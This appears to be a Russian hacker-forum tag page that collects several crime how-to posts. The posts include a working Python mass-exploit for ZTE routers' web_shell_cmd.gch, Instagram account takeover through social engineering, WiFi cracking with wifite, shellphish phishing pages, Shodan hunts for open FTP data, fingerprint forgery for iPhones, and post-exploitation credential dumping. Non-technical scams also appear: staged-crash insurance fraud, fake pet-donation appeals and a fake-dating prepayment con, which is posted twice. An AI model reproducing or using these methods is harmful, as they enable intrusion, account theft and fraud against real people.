Новости и объявления.
- Уважаемые гости. При посещении нашего сайта, просим вас ознакомиться с разделами форума, прежде чем оставлять ваши объявления и т.д. Рекомендуем посетить разделы: "Общение, Коммерческий раздел, Услуги Хакеров и статьи, Отзывы о сайте и пользователях, Черный список" и другие разделы нашего сайта. ***ВНИМАНИЕ*** При обращении за помощью, просим быть внимательными, на сайте есть, как проверенные специалисты, так и непроверенные. Если вы обратились к специалисту, который проверку НЕ проходил, рекомендуем воспользоваться услугой гарант сервиса. XAKERSAY.COM
Search the Community
Showing results for tags 'метод'.
-
В данной статье расскажу, как легко заполучить аккаунте в инстаграме, пользуясь доверчивостью людей. Расскажу лишь для ознакомления, чтобы вы не попали в подобную ловушку. Для взлома нам нужно будет заполучить доступ к почте пользователя. Сегодня многие почтовые сервисы переходят на более совершенную защиту от взлома – двухфакторную аутентификацию, а про секретное слово все забыли. Но сервисы как яндекс и рамблер, используют данный метод защиты, для восстановления всего-лишь надо написать слово-ключ. Теперь нужно потратить немалое количество времени на то, чтобы найти аккаунты с подходящими видами почт. Лично я использовал созданный скрипт, позволяющий сканировать подписчиков определенной группы или человека и записывать необходимые почтовые адреса, поискать такой скрипт можете только самостоятельно. Как мы видим, записаны профили и их адреса, точнее лишь кусок, но благодаря ним, мы можем узнать и полный адрес почты. Для примера выбираем любой ящик яндекса. Переходим к профилю и в контактах находим почтовый адрес данного человека. Хорошо, заходим на яндекс почту и сбрасываем пароль данного адреса, как и ожидалось, вопрос “Имя собаки”. Перебрав самые распространенные имена и не получив результата, мы отправляемся в диалог с человеком и подключаем социальную инженерию. Для этого делаем новый аккаунт, представляемся какой-то группой для животных, после чего пишем: Отлично, поговорим получаем ответ на вопрос, теперь мы имеем необходимые данные для входа в инстаграм аккаунт. Хочу сказать, обычно никто не использует двухфакторную аутентификацию в Инстаграме, поэтому сбросить пароль будет проще простого.
-
- социальная инженерия
- взлом
- (and 10 more)
-
Всем привет, сейчас расскажу об отличном инструменте, который поможет вам во взломе WiFi – wifite. Это крайне маленький гайд, все предельно просто и ясно даже новичку. Данную утилиту можно найти по стандарту в кали линукс, поэтому спокойно этот способ подойдет даже для телефонов. Вся информация лишь для ознакомления и возможного создания безопасной оболочки от взломов. Способ взлома весьма стандартный, перехват хеша и деаутентификация. Главный плюс инструмента, то что всю работу он берет на себя и автоматизирует процесс ввода команд. Начнем 1. Запускаем кали 2. Открываем консоль и устанавливаем пользовательскую версию программы, так как стандартная уже не обновляется. 3. Когда будет установлена, пишем – cd wifite2 и заходим в корень к инструменту 4. Чтобы запустить: ./Wifite.py Наша карта теперь автоматом перевелась в режим мониторинга, моментально сканируются ближайшие сети, ожидаем обнаружения нужной. 5. Выбираем сеть, которую собираемся подвергнуть атаке. 6. Клацаем ctrl+c прописываем номер сети или несколько номеров. 7. Начинается деаутентификация и перехват хэндшейков, ожидаем некоторое время. После перехвата мы увидим уведомление, если выбрано несколько сетей, процесс повторяется для каждой сети. 8. Полученный хеш мы можем расшифровывать любым доступным способом.
-
Всем привет, я опять хотел бы рассказать об одном способе заработка. Схема заключается во взаимодействии с разными пратнерсками. А все будет привязано к ответам Меул.Ру. Для этого нам нужно подобрать определенную категорию, для этой статьи я выбрал категорию – Красота и здоровья. Вы можете использовать любую другую. Итак, что мы тут видим? Различные ответы, обычно касающиеся различных болезней и недугов, а также рекомендации людей о том, как можно их вылечить. Для примера мы выберем первый вопрос из списка. Теперь переходим в любую партнерку и ищем подходящий для этого оффер. Я могу порекомендовать эту – M1-shop.ru Ладно, на самом деле я не стал искать оффер конкретно о витаминах, но думаю вы поняли принцип. Главную роль играет не сам оффер, а его подача потребителям. Не нужно просто кидать предложение в лицо, подробно расскажете, как вам оно помогло, а также прикрепите ссылку, где можно его получить. За подтверждение одного заказа этого оффера вы будете получать целых 700 рублей! Не забывайте, у каждого оффера оплата различается. В офферах делайте упор на широкий спектр ГЕО, чтобы не случилось так, что человек, например, из Беларуси зайдя на сайт не засчитался, ведь принимать будут например только Россию. Размещая подобные ссылки вы создаете пассивный доход, ведь подобные вопросы порой висят очень долго, а значит через них проходит огромный трафик. Безусловно, очевидную рекламу сразу же удаляют, но более натуральные сообщения живут довольно долго. Также, вы можете создать два аккаунта, с одого вы будет создвать вопросы, с другого – отвечать.
-
Сегодня расскажу вам про то, как реализовать крайне популярную на просторах СНГ оффлайн схему с автострахованием. Переходим к схеме 1. Очевидно, что для того, чтобы провернуть эту тему, нам нужен автомобиль. Оптимальный вариант - какой-нибудь японец в пределах 100к на ходу. В приоритете будет Марк 2, Nissan Cefiro 3 и другие маркообразные авто, у которых кузовные детали стоят очень дорого. 2. Логично, что для реализации нужен, собственно, "виновник" аварии со страховкой. Им может быть друг\брат\сват, кто угодно, главное, чтобы вы держали с этим человеком контакт и между вами были доверительные отношения. Идеальный вариант, если у этого чела будет какой-нибудь старенький ВАЗ, ГАЗ, КАМАз. 3. Планируешь с ним ДТП так, чтобы он был виноват, идеальное место - светофор или пешеходный переход, чтобы он ударил тебя в "жопу" как следует. Главное - повредить на твоей машине как можно больше деталей. Например, за тот же Nissan Cefiro при повреждениях двух задних крыльев, обеих фар, крышки багажника и бампера выплатят от 150к, а то и все 250к. Можно придумать и свой вариант столкновения. Например, прочесать всю бочину с крыльями и дверьми. Советую заранее подсчитать стоимость того, что будете повреждать в РСА, чтобы по нелепой случайности не уйти в убыток (есть определённые машины, на которых РСА оценивает фару в 150 т.р., а ее себестоимость на форумах 500-3000 рублей). Время суток лучше всего дневное, так как будет меньше подозрений. Вести себя необходимо как при обычном ДТП, будто вы не знакомы, но это и ежу понятно. Делаем фотографии, лучше всего специально понизить качество, главное - зафиксировать сами повреждения. Далее мы НЕ вызываем ГАИ, а делаем дозвон и сбрасываем. Едем в ГАИ сами, на вопрос: "почему не вызвали?" показываем телефон, мол звонили и не дозвонились. Оформляем ДТП, показываем фото, рассказываем одну историю, как все получилось и ваши повреждения. Далее вы уже собственноручно дополняете повреждения, если, конечно, это требуется. 4. Вы получите выписку, с ней уже можно самостоятельно возиться со страховой компанией и требовать выплаты, но оптимально и менее запарно будет найти юриста, занимающегося именно ДТП, благо в городах от 300к таких очень много и за 5-10к они вытрясут страховую компанию по полной программе. Идеально, чтобы у юриста были подвязки с экспертами страховых компаний (попадаются такие часто, так как эксперты тоже "в теме"). 6. После получения выплаты ремонтируем, красим свою битую машинку у армян по дешевке, делимся с сообщником и юристом, остальное кладем себе в карман. 7. Через месяц-полтора вновь прогоняем схему. Доказать, что это сговор практически нереально!
-
Я хочу рассказать про уязвимость в ZTE роутерах, доступному по URI router_ip:443/web_shell_cmd.gch. Уязвимость заключается в том, что мы посылаем POST-запрос с ошибкой и ее типом, а в ней — код для выполнения. Информация предназначена исключительно для ознакомления. Не нарушайте законодательство. Поехали! import threading import socket import ssl import time import sys info = open(str(sys.argv[1]),'a+') class skid(threading.Thread): def __init__(self, ip): threading.Thread.__init__(self) self.ip = str(ip).rstrip('\n') В этом участке кода мы загружаем необходимые модули для работы эксплойта. Также я сделал, чтобы цели брались из списка, подготовленного нами. В конце я покажу пример запуска эксплойта. И ещё на этом участее кода есть многопоточность. Далее в коде: def run(self): try: f1 = "POST /web_shell_cmd.gch HTTP/1.1\r\nHost: 127.0.0.1\r\nUser-Agent: HaxerMen\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\nContent-Length: 114\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\nIF_ACTION=apply&IF_ERRORSTR=SUCC&IF_ERRORPARAM=SUCC&IF_ERRORTYPE=-1&Cmd=mkdir+hacked&CmdAck=\r\n\r\n" sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) ssl_sock = ssl.wrap_socket(sock) ssl_sock.connect((self.ip, 443)) ssl_sock.sendall(f1.encode('utf-8')) ssl_sock.close() time.sleep(3) print("[Pwned]" + self.ip) except Exception as e: print(e) return мы передаём переменной f1 — payload, отправляя POST-запрос на /web_shell_cmd.gch с ошибкой, где в типе ошибке уже содержится payload. Для примера я просто сделал команду, которая создаёт папку hacked. Далее идут SSL-сокеты, которые отправляют payload устройствам из списка. При успешной передаче команды роутеру ZTE выводится надпись Pwned + IP роутера. Слэшы и точки должны быть в hex формате, а пробелы — заменяться знаком +. Далее в коде идёт простая функция, которая просто запускает эксплуатацию роутеров: for ip in info: try: time.sleep(0.01) skid(ip).start() except: pass Пример запуска: python exploit.py zte Где zte — это список IP адресов роутеров ZTE. Тип записи IP роутеров ZTE в список: 192.168.1.1 192.168.1.2 192.168.1.3 Исходный код эксплойта: import threading import socket import ssl import time import sys info = open(str(sys.argv[1]),'a+') class skid(threading.Thread): def __init__(self, ip): threading.Thread.__init__(self) self.ip = str(ip).rstrip('\n') def run(self): try: f1 = "POST /web_shell_cmd.gch HTTP/1.1\r\nHost: 127.0.0.1\r\nUser-Agent: HaxerMen\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\nContent-Length: 114\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\nIF_ACTION=apply&IF_ERRORSTR=SUCC&IF_ERRORPARAM=SUCC&IF_ERRORTYPE=-1&Cmd=mkdir+hacked&CmdAck=\r\n\r\n" sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) ssl_sock = ssl.wrap_socket(sock) ssl_sock.connect((self.ip, 443)) ssl_sock.sendall(f1.encode('utf-8')) ssl_sock.close() time.sleep(3) print("[Pwned]" + self.ip) except Exception as e: print(e) return for ip in info: try: time.sleep(0.01) skid(ip).start() except: pass Эксплойт работает на python2.
-
- уязвимость
- эксплойт
-
(and 11 more)
Tagged with:
-
Друзья, сегодня минимум слов, максимум дела! В материале ниже будем смотреть инструменты пост-эксплуатации для систем Linux! Что можно сделать после того как ты уже прорвался во внутренний периметр сети, или, как на CTF-соревнованиях, когда ты получил доступ к уязвимой тачке и готов броситься в бой дальше! Пост-эксплуатация в практике пен-теста Пост-эксплуатация (англ. post-explotation) — это то, что можно сделать с целевой системой после того, как удалось найти уязвимость и выполнить какой-то участок кода на целевой системе. Так же под этим термином понимается один из этапов взлома компьютерных систем (фаза) позволяющая собирать дальнейшую информацию о целевой системе, получить дальнейший доступ к сети и хранящимся данным. Фаза пост-эксплуатации позволяет идентифицировать такие вещи, как дополнительные подсети, маршрутизаторы, названия серверов, сетевых служб и установленных приложений. Фазы (этапы) проведения тестирования на проникновение Основные паттерны, по которым работают злоумышленники на этапе пост-эксплуатации: получить доступ на выполнение произвольного кода\команд изучение данных, хранящихся на сервере перехват данных, которых нет на системе сейчас, но они могут появиться в будущем организация перманентного доступа к целевой системе эскалация привилегий до уровня системы для непривилегированной учетной записи Дополнительно, хакер может получать информацию о скомпрометированной системе, анализируя следующие параметры: конфигурацию системы (логин и пароль к БД в исходных кодах) конфигурацию веб-сервера (например, httpd.conf, .htaccess) исходные коды приложения (поиск уязвимостей, анализируя логику приложения) доступы к окружению (находясь внутри сети может быть проще попасть на соседние сервера и изолированные сегменты подсети) базы данных (аутентификационная информация к другим системам, хранящаяся в них Обзор инструментов пост-эксплуатации Мы же в материале сделаем акцент на рассмотрение инструментов пост-эксплуатации исключительно под Linux-системы. 1. PXEenum — полное перечисление всего что есть в системе Основной задачей данного скрипта является функция перечисления (англ. Enumeration). Он вытаскивает всю доступную информацию о системе. Данный скрипт создан, если не сказать, что создан для лентяев то для тех, кто ценит свое время. Для запуска он не требует прав root’а, работает в стандартном терминале. # wget https://raw.githubus...ster/PXEnume.sh Установка: # git clone https://github.com/s...uong/PXEnum.git # cd PXEnum/ # chmod +x PXEnum.sh # bash PXEnum.sh 2. MIDA Multitool — палим систему по взрослому Другой интересный инструмент MIDA Multitool созданный на базе менее именитых собратьев SysEnum и RootHelper, но включающий в себя гораздо больший функционал. По воле разработчика функционал MIDA Multitool включает в себя отдельные функции своих предшественников под одним капотом, а именно: SysEnum — Bash скрипт, предназначенный для получения основной информацию о системе, включая, но не ограничиваясь следующими данными — текущий пользователь, IP-конфигурация, таблицы ARP, запущенные процессы и т.д. Roothelper — призван помочь в процессе эскалации привилегий в системе, которая была скомпрометирована, путем выполнения ряда перечислений и использования доверительных сценариев. Устанавливаем скрипт в систему с github: # git clone https://github.com/N...h-Kit-Multitool # cd Bash-Kit-Multitool # chmod +x bashkit.sh Запускаем скрипт: # /.bashkit.sh Дело сделано! Можно запускать в системе! 3. MimiPenguin — тырим пароли без зазрения совести Очень хорошо известный скрипт в узких кругах пен-тестеров под названием MimiPenguin. основной задачей утилиты служит сброса пароля на вход в систему от текущего пользователя Linux. Если такое сравнение возможно то это аналог утилиты mimikatz для дампа пароля в Windows системах (о ней мы уже рассказывали в одной из наших прошлых статей) Кроме того, MimiPenguin поддерживает такие приложения, как VSFTPd (активные подключения клиента FTP), популярнейший web-сервер Apache2 (активные/старые сеансы HTTP BASIC AUTH, но для этого требуется Gcore) и openssh-сервер (активные подключения SSH с использованием команды sudo). И вообще необходимо сказать, что MimiPenguin часто становится частью эксплойтов под Linux. Устанавливаем MimiPenguin забирая его с репозитория GitHub: # git clone https://github.com/h...gal/mimipenguin # cd mimipenguin # ls –a # chmod +x mimipenguin.sh # ./mimipenguin.sh 4. LARE — ломимся под рута используя баги ядра И напоследок еще один довольно простой скрипт, который помогает с помощью использования известных уязвимостей в ядре ОС получать привилегии root удаленно с атакующей машины. Скрипт использует локальные эксплойты для получения root прав для версий ядра Linux Kernel v2.6-v4.8. Кстати, эта тулза очень часто находит свое применение на пиздатом сертификационном экзамене OSCP. Устанавливаем скрипт в систему: # git clone https://github.com/EnigmaDimitri/LARE && cd LARE # chmod +x LARA.sh # LARE.sh -a Запуск скрипта на целевой машине в сети # LARE.sh -l [Attackers-IP] Запуск на машине с подключением к базе данных эксплойтов на GitHub # LARE.sh -l or ./LARE.sh -l Проверка и защита системы от техник пост-эксплуатации Для обеспечения безопасности системы на предмет пост-эксплуатации, по мимо традиционных вариантов защиты как то установка патчей (security patch) и минимизация привилегий, дополнительно существуют специальные тулзы для проверки системы. Ведь в противовес неправильно сложившегося мнения, к пост-эксплуатации не обязательно ведут только 0-dayили устаревший софт,
-
- инстурмент
- метод
- (and 11 more)
-
На Ютубчике кто только не предлагает заработать - все трубят, что это вообще легко! И предлагают всякие заумности, неведомые темы, способы раскрутки и вообще заваливают всякой бредятиной... Я же вам могу посоветовать другой подход, попроще. Суть - возьмите для канала нишу, которая уже успешно выстрелила в других областях. И просто повторите это всё на ютубе, сделав немного по-своему. Простой пример ниши - ответы на вопросы. В принципе дальше можно не расписывать - должно и так быть понятным. Но для самых мозговитых поясню пару моментов. Ищем самые популярные сайты вопросов-ответовВыбираем из них наиболее популярные темыДелаем слайды с текстом + иллюстрациями в темуОзвучиваем видеоОптимизируем под поисковые запросыЗаливаем по 3-5 видосов в день.Совсем недавно я видал подобный канал - качество среднее, но за год паренёк залил около 1000 видосов. Теперь его ориентировочный доход около 15-20$ в день. ПАССИВНО! И это далеко не предел! И ниша только одна... Так что, думаю, идея понятна. Ленивым тут делать нечего, конечно. Схема не идеальна, согласен, однако при должном подходе и терпении добиться желаемого результата не так тяжело. А если вы получите первый успех, то дальнейшее развитие будет весьма легким и не таким трудоемким как раньше.
-
Привет, анон. Сегодня я расскажу тебе, что такое 21 порт и почему его лучше не держать открытым. Посмотрим, сколько устройств доступны для анонимной авторизации. Я расскажу тебе, как можно автоматизировать поиск и как отсеивать пустые запросы в Shodan. Вся информация предоставлена исключительно в образовательных целях. Что делать с найденной информацией — личный выбор каждого. Что такое FTP? FTP – File Transfer Protocol, это широко распространенный протокол который необходим доя передачи файлов. Он необходим чтобы передавать файлы можно было между системами одной сети. Чтобы это сделать человек подключается к серверу с данным протоколом и с помощью каталога что-то скачивает, загружать или удаляет. Также существую более безопасные версии данных протоколов, а именно – FTPS и SFTP Чтобы получить доступ к серверам с данным протоколом необходимы FTP-клиенты, это специальный программы и их больше множество. Самые популярные из бесплатных это: FilzeZilla, Total Commander, WinSCP и FAR Manager. Как найти открытые FTP-сервера? Как ты уже догадался, некоторые файловые серверы являются открытыми. Достаточно просто найти их, проверить каталоги, загрузить/скачать файлы. Для начала проверим Shodan. Для этого используем вот такой запрос: "230 login successful" port:"21" На момент написания статьи, было 173220 результатов. Лидер открытых FTP — США с результатом 58320 записей. При желании можно отфильтровать результаты по операционным системам и продуктам. Среди ОС популярны: Linux 3.x, Linux 2.6.x и Windows XP. Среди продуктов vsftpd, Pure-FTPd, pyftpdlib, Microsoft ftpd и ProFTPD. Конечно, среди выдачи Shodan существует достаточно много пустышек. Поэтому для тех, кто хочет оптимизировать поиск можно написать софт, который будет подключаться к FTP-серверу и анализировать наличие каталогов и их размер. На выходе получаем полноценный список FTP-серверов. В России ситуация выглядит следующим образом. 10134 результата. Среди компаний лидирует — Mobil-group ltd. Также в списке есть: Rostelecom, Beeline, VimpelCom и REG.RU. Конечно, чтобы улучшить результаты я советую отбирать конкретные модели по заголовкам и искать конкретные устройства. Например, для работы с Xiaomi-девайсами можно использовать заголовок — "220 Welcome to MI-3 FTP service". "230 login successful" "220 Welcome to MI-3 FTP service" port:"21" Список устройств можно существенно расширить. Чтобы лучше разобраться, рекомендую сначала посмотреть устройства: RT-AC66R, RT-AC66U, RT-N66R, RT-N66U, RT-AC56U, RT-N56R, RT-N56U, RT-N14U, RT-N16 и RT-N16R. Можно найти и посмотреть, какие заголовки используются для успешной авторизации без логина и пароля. Вот пример, для одного устройства из списка. "220 Welcome to ASUS RT-N56R FTP service" "230 Login successful." Как подключиться к FTP-серверу? Я покажу на примере FileZilla. Этот клиент имеет простой и понятный интерфейс. В нашем случае достаточно указать IP. После этого нажимаем "Быстрое соединение" и получаем каталоги, которые доступны на FTP-сервере. Среди файлов можно найти очень много разной информации: конфиги, бэкапы, доступы, учетки, загрузки, данные клиентов, документация, фото и т.д. Тут важно разделять личные и корпоративные FTP. Нужно быть готовым, что в первом случае часто будут попадаться фото котиков и записи с детских утренников, во втором более серьезная информация. Что делать с данными — личный выбор каждого. Заключение Все понимают, что критично оставлять открытым 21 порт. Тем не менее, сотни тысяч устройств доступны для анонимного доступа. Я показал, как можно достаточно просто найти файловые хранилища и получить доступ к файлам. Для более серьезной и масштабной работы можно существенно оптимизировать процесс поиска. Очень просто фильтровать сервера по наличию данных и размеру. Также можно оптимизировать поиск для конкретных папок или файлов. Но это уже другая история
-
- сервер
- информация
- (and 12 more)
-
Всем привет, сейчас я вам хочу рассказать о том, как же можно очень быстро создать фишинговый сайт. Кто незнаком с этим понятием – то прошу ознакомиться, а если говорить проще, то это поддельный сайт. Итак, для работы на понадобится операционная система Kali Linux, после чего надо открыть ее консоль и ввести данную команду: git clone https://github.com/thelinuxchoice/shellphish Отлично, теперь здесь нам надо прописать данные команды: cd shellphish bash shellphish.sh Теперь из предложенных вариантов фишинговых сайтов мы должны выбрать нам необходимый. В качестве примера мною будет выбран фишинговый сайт для Инстаграм. Нам на выбор будет предоставлено несколько способов, я же выберу способ под номером 01, после чего нам нужно будет прописать порт, в случае его отсутствия – пропустить его ввод. Итак, мы видим данную ссылку, нам необходимо ее скопировать и вставить в адресную строку. Как вы видите, фейковая страничка была успешно создана, переходя по которой жертва введет свои данные для входа в аккаунт. После этого жертву перекидывает на официальный сайт инстаграм, если че пользователь уже был авторизован, то сразу же будет открыта его страничка в соц. сети. В то время как жертва отправляем нам свои данные, мы их получаем прямо в консоли, где мы может узнать IP, местонахождение и так далее. А вот после непосредственного нажатия кнопки входа мы получим данные вида: логин и пароль. Как вы видите это занимает кране много времени, но это не меняет того, что данный метод взлома страничек является очень эффективным.
-
Всем привет, наверняка вы во многих фильмах видели, как злодеи взламывали биометрические пароли. Так вот, сейчас я хочу подробнее рассказать вам об этом и доказать, что биометрические системы можно обойти, например, для получения доступа к айфонами. Предисловие Думаю, не стоит обсуждать для чего вам понадобились чужие отпечатки и доступ к чужим смартфонам, меня это уже не касается. Поэтому вдохновляясь Разрушителями Легенд, когда они пытались обойти биометрические сканеры, я отравился в гугл, чтобы узнать об этом как можно больше и получить опыт в этом. Необходимые вещи 1.Как ни странно, но первым делом нам нужно заполучить сам отпечаток, с помощью которого можно разблокировать смартфон. Например, данный отпечаток можно сфотографировать, после того как жертва оставит его на чем-либо. Чтобы отпечаток было лучше видно, вам нужно будет посыпать его грифелем. 2.Лазерный принтер и необходимая для него пленка Да, нужен именно лазерный, для данной работы не подойдет даже самый технологичный струйный принтер. 3.Фотополимер Verbatim Что это и какими особенностями он обладает вы сможете узнать на просторах интернета. Кстати, это правда интересно. 4.Небольшие стеклышки Те, который используются в больницах для проверки крови или такие же как на уроках биологии, которые использовались для наблюдения под микроскопом различных вещей. 5. Лампа с ультрафиолетовыми лучами 6. Стиральный порошок 7. Компьютер на котором имеется фотошоп 8. Пачка от сигарет Приступаем к самой работе 1.Первым делом открываем сфотографированный нами отпечаток пальца в фотошопе, после чего увеличиваем его до необходимых размеров и при необходимости дорисовываем линии, которые плохо отобразились. После этого переводим фото в негатив. 2. Теперь нам нужно уменьшить картинку до размера пальца и все это сохранить. 3. Далее нам нужно распечатать на пленке принтера данной отпечаток, этот пункт является самым сложным, ведь нам нужно угадать точный размер отпечатка, а сделать это довольно трудно. 4. Берем отдельную пленку и вырезаем от нее кусок чуть более чем наш отпечаток. 5. Теперь в ход пойдет пачка от сигарет, из который нам нужно сделать такой же кусок. 6. Теперь достаем стекло, прикладываем к нему чистый кусок пленки, после этого капаем на него немного полимера, самое важное, чтобы не переборщить. 7. Теперь целофан, который мы ободрали с пачки сиграет мы прикладываем к пленке и накрывает это все другим стеклышком. 8. Теперь нам нужно включить лампу ультрафиолета и начать “прожарку” всей этой херни. Делаем это на протяжении десяти минут. 9. После прожарки нам нужно убрать стекло, которое накрывает все это и забираем пленки, предварительно с большой осторожностью убрав целофан. Отлично, у нас есть что-то похожее на силикон. Главное выполнить все правильно, если эта штучка будет слишком твердой, то вы передержали включенной лампу, если слишком мягкая, то наоборот – недодержали. 10. Теперь обратно ложим касок пленки на стекло, после чего ложим на него сверху наш отпечаток пальца и опять накрываем его другим стеклом. 11. Опять ставим на прожарку под ультрафиолет. После чего с большой скоростью снимает стекло, аккуратно снимаем плену и пускаем пленку под струю теплой воды, чтобы пленка придалась рельефу. 12. После промывки этот кусочек опять кладем на пять минут под ультрафиолет и ждем, когда она затвердеет. 13. Когда она затвердеет, нам нужно содрать резину с пленки и аккуратненько обрезать. Все готово, теперь данный отпечаток вы можете приложить к своему пальцу и с легкостью разблокировать яблочные смартфоны.
-
Всем привет, хочу поговорить о схемке с пожертвованиями. Собирать их можно как в онлайне так и в реальной жизни. В реальной жизни вам нужно будет расклеивать объявления с фоткой питомца и определенным текстом. Я же расскажу вам про онлайн методы в популярных социальных сетях. Вконтакте От нас требуется покупка активных аккаунтов женской аудитории, у которых будет не менее 100 друзей, нам понадобится около 10 таких аккаунтов. Когда вы их купите, то делаете рассылку всем друзьям о том, что случилась какая-то неприятная ситуация с животным. Вот пример сообщения: Собаку Джеси сбил водитель автомобиля. Сам он скрылся. Номер машины: В 387 КМ. Собаке требуется операция, требуется более 50000 тысяч рублей, операцию нужно провести срочно. Для хозяев это не подъемная сумма, помогите пожалуйста члену данной семьи. Ведь животные и так беззащитны. Им нужно помогать Реквизиты: 1234 5678 9012 3456 Номер для контактов: Это лишь быстрый набросок, вы же можете продумать все до мелочей, чтобы смотрелось как можно более натурально. Одноклассники Тут нам нужно выполнить все те же действия. Нужно закупить аккаунты и придумать историю про бедное животное, после чего отправлять сообщения всем возможным друзьям. Instagram Тут уже не все так просто. Нам нужно забить в поисковой системе город, котором мы хотим начать работу. После этого, нам нужно будет найти паблик этого города и обраться в Директ для установления рекламы. Как показывает практика, такие объявления не стоят больших денег, а это значит, что это наш вариант. Может даже над вами сжалятся и разместят рекламу за бесплатно. Также помните, что все многие наши жертвы очень любят красивых девченок. А это значит, что нам нужен аккаунт, где на фото с девушкой есть какой-то питомец. После чего начинаем общением с жертвой и когда он уже вам доверяет, вы рассказываете ему печальную историю о вашем питомце.
-
Всем привет, сегодня я бы хотел рассказать вот о способе заработка на фейковых свиданиях. Не буду много говорить, думаю перейдем сразу к сути данного способа. Первым делом что нам понадобится – это зарегистрировать аккаунт девушки в социальной сети, желательно вконтакте. Если вам лень, то можете купить уже готовый аккаунт, но если вы не хотите вкладывать пару рублей, то первый вариант вам подойдет больше. Вам будет необходимо как можно лучше оформить и заполнит аккаунт красивыми фотками. Никой эротики и голых фотографий. Максимум что вы можете позволить в этом плане, это фото в купальнике, платье и прочем. Вы не должны никак выделяться от других. Второе что вам понадобится – это иметь телефон, а также левую сим-карту, ну или можете воспользоваться подменой номера, об этом я уже рассказывал в своей статье. Если же вы не хотите использовать этот способ, то вы можете просто по дешевке купить симку в переходе. Итак, подготовка завершилась, теперь начнем действовать. Нам необходимо зайти в группы предназначенных для знакомств, в принципе можете выбирать и группы с название “Секс без обязательств”, после чего ждем наших жертв. Когда кто-то напишет вам, вы должны будете поболтать, возможно покидать какие-то фото. После этого, с вами безусловно захотят встретится, но в случае этого мы сразу отвечаем им, что у вас встретиться не получиться под каким-либо предлогом. Например, “Я с родителями живу, а к тебе поехать не могу, так как мы еще не так хорошо знакомы”, это будет вынуждать его снимать квартиру на короткий срок. После того, как он клюнул, нам нужно будет создать на любом сервисе объявление о сдаче квартиры на сутки, после чего загружаем фейковые фотки и выставляем цену меньше обычной, а номер для контактов даем тот, который вы до этого получили. После этого вам будет необходимо от лица девушки скинуть это объявление вашей жертве и навешать лапши о том, какая эта квартира прикольная и классная, какие красивые виды и где находится. Если и это выходит, то дальше мы уже под видом арендодателя берем трубку, когда вам позвонят на счет квартиры. И начинаем говорить: “Конечно, сдаю, но снять ее хотят много кто, вы когда ходите? Сегодня вечером? К сожалению, туда уже хотели в это время люди заехать, но предоплату они так и не внесли, если вы сейчас предоплату внесете, то без проблем – выезжайте”. После этого оставляем данные, куда будут переведены деньги и нам этом все.
-
Всем привет, сегодня я бы хотел рассказать вот о способе заработка на фейковых свиданиях. Не буду много говорить, думаю перейдем сразу к сути данного способа. Первым делом что нам понадобится – это зарегистрировать аккаунт девушки в социальной сети, желательно вконтакте. Если вам лень, то можете купить уже готовый аккаунт, но если вы не хотите вкладывать пару рублей, то первый вариант вам подойдет больше. Вам будет необходимо как можно лучше оформить и заполнит аккаунт красивыми фотками. Никой эротики и голых фотографий. Максимум что вы можете позволить в этом плане, это фото в купальнике, платье и прочем. Вы не должны никак выделяться от других. Второе что вам понадобится – это иметь телефон, а также левую сим-карту, ну или можете воспользоваться подменой номера, об этом я уже рассказывал в своей статье. Если же вы не хотите использовать этот способ, то вы можете просто по дешевке купить симку в переходе. Итак, подготовка завершилась, теперь начнем действовать. Нам необходимо зайти в группы предназначенных для знакомств, в принципе можете выбирать и группы с название “Секс без обязательств”, после чего ждем наших жертв. Когда кто-то напишет вам, вы должны будете поболтать, возможно покидать какие-то фото. После этого, с вами безусловно захотят встретится, но в случае этого мы сразу отвечаем им, что у вас встретиться не получиться под каким-либо предлогом. Например, “Я с родителями живу, а к тебе поехать не могу, так как мы еще не так хорошо знакомы”, это будет вынуждать его снимать квартиру на короткий срок. После того, как он клюнул, нам нужно будет создать на любом сервисе объявление о сдаче квартиры на сутки, после чего загружаем фейковые фотки и выставляем цену меньше обычной, а номер для контактов даем тот, который вы до этого получили. После этого вам будет необходимо от лица девушки скинуть это объявление вашей жертве и навешать лапши о том, какая эта квартира прикольная и классная, какие красивые виды и где находится. Если и это выходит, то дальше мы уже под видом арендодателя берем трубку, когда вам позвонят на счет квартиры. И начинаем говорить: “Конечно, сдаю, но снять ее хотят много кто, вы когда ходите? Сегодня вечером? К сожалению, туда уже хотели в это время люди заехать, но предоплату они так и не внесли, если вы сейчас предоплату внесете, то без проблем – выезжайте”. После этого оставляем данные, куда будут переведены деньги и нам этом все.
-
Когда мы хотим удалить какие-то старые и ненужные нам файлы, мы просто выделяем их и нажимаем кнопку “удалить” после этого мы о них забываем. Но теперь давайте подумает, а правда ли они уничтожаются? После того как были созданы твердотельные накопители, удаление стало не тем, к чему мы привыкли. И так как восстановление файлов не стоит на месте, то и возможности полного уничтожения файлов тоже нужно иметь. Так что делает с вашими файлами SSD после того как вы нажали “удалить?”. Об этом и пойдет речь в этой статье. Что происходит после удаления Мы тыкнули кнопку “удалить” и все, больше мы его можем никогда не увидеть. Но куда же он пропадает? На самом деле, удаление информации – это многоступенчатый процесс. После того как вы удалите файл первый раз, он просто будет помещен в корзину. Таким образом файл не получает никаких повреждений и его можно будет сразу же вытащить из корзины, если мы удалили что-то по случайности. Следующим этапом удаления является уничтожения файлов в корзине. Большое количество ОС проводят слежение за файлами благодаря “указателям”. Любая информация имеет собственный указатель, который показывает вашему компьютеру, где можно отыскать необходимую информацию. Когда вы уничтожили данные из корзины, то файлы теряют этот указатель и они становятся доступны для перезаписи. Да, больше вы этот файл никак не сможете увидеть, но пока часть диска, где находился ваш файл, не будет перезаписан, то файлы все еще будут существовать. Именно поэтому существует множество программ для восстановления файлов. Даже больше, есть программы, которые могут восстановить часть не перезаписанных файлов. Это все было справедливо для обычных жестких дисков, твердотельные накопители работают несколько иначе. Как точно удалить файлы с SSD Отлично, мы узнали принцип удаления файлов на накопителях, поэтому теперь стоит рассказать о нескольких методах, которые позволят раз и навсегда уничтожить необходимые данные. На данный момент есть несколько способов и программ, который практически со 100 процентной вероятностью очистят ваш твердотельный накопитель. Уничтожение данных с помощью ПО Первый способ заключается в использовании Secure Erase. Так называют процесс, который влечет за собой заполнение ячеек памяти обычными “нулями”, данный способ очень эффективен, однако некоторые исследователи говорят о том, что способ был плохо реализован. Поэтому в некоторых случаях данные могут не уничтожиться. Большое количество производителей SSD создают собственное программное обеспечение для полного удаления 